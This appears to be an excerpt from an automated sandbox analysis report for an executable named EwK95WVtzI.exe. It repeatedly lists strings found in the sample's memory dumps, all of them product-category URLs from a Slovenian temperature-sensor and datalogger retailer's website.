00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/povrsinska-temperaturna-tipala/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/prenosna-temperaturna-tipala/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/temperaturna-tipala-predhodna-sifr
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/wireless-temperaturna-tipala/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/zunanja-in-prostorska-temperaturna
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/dodatna-oprema-za-da
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/osnovni-dataloggerji
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/precizni-dataloggerj
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/tehnoloski-data-logg
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/veckanalni-in-s-tisk
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/web-brezzicni-wifi-r
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dodatna-oprema-za-termometre-logg
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/ex-termometri-in-dataloggerji/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/
